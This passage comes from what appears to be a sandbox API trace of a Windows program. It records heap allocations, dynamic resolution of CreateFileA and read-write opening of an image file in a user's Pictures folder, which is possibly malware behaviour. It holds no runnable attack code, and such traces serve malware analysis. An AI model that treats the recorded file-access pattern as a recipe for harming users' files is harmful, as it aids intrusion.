0x8e1b50 [0189.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0189.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0189.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0189.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0189.662] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.665] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0189.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bda38 [0189.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bda38, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.665] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0189.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0189.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.666] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0189.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", cchWideChar=83, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0189.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x53) returned 0x8c4a48 [0189.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", cchWideChar=83, lpMultiByteStr=0x8c4a48, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png", lpUsedDefaultChar=0x0) returned 83 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0189.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0189.667] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\e hluvffklat\\pw6npsjwo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.667] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0189.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa6) returned 0x8fcbc0 [0189.668] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=83, lpWideCharStr=0x8fcbc0, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\E hluVFFklat\\Pw6nPSJwo.png") returned 83 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6e48 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fcbc0 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0189.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0189.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 